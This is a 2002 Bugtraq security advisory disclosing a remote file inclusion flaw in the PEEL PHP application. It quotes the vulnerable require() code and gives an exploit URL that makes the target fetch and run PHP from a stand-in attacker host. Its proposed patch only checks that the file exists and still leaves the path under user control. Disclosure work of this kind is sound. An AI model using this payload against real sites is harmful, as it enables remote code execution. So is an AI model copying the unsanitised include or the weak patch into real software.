PEEL (PHP)
From: Frog Man (leseulfrog@hotmail.com)
Date: 12/31/02
- Previous message: Ben Laurie: "Re: CITIBANK [CANADA]: INTERNET EXPLORER BROWSERS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Frog Man" <leseulfrog@hotmail.com> To: bugtraq@securityfocus.com Date: Tue, 31 Dec 2002 16:11:05 +0100
Informations :
°°°°°°°°°°°°°°
Version : 1.0b
Website : http://www.mapetite-entreprise.com
Problem : Include file
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
modeles/haut.php :
-----------------------------------------------------------
<?
$langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
require ($langfile);
?>
[...]
-----------------------------------------------------------
Exploit :
°°°°°°°°°
http://[target]/modeles/haut.php?dirroot=http://[attacker]&SESSION=.
with :
http://[attacker]/lang/lang.php
Patch :
°°°°°°°
In modeles/haut.php replace the lines :
-----------------------------------------------------------
<?
$langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
require ($langfile);
?>
-----------------------------------------------------------
by :
-----------------------------------------------------------
<?
$langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
if (file_exists($langfile)){
require ($langfile);
}
?>
-----------------------------------------------------------
A patch can be found on http://www.phpsecure.org
More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/PEEL.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPEEL.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools 08:30:34 -0700 (MST)
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
- Previous message: Ben Laurie: "Re: CITIBANK [CANADA]: INTERNET EXPLORER BROWSERS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
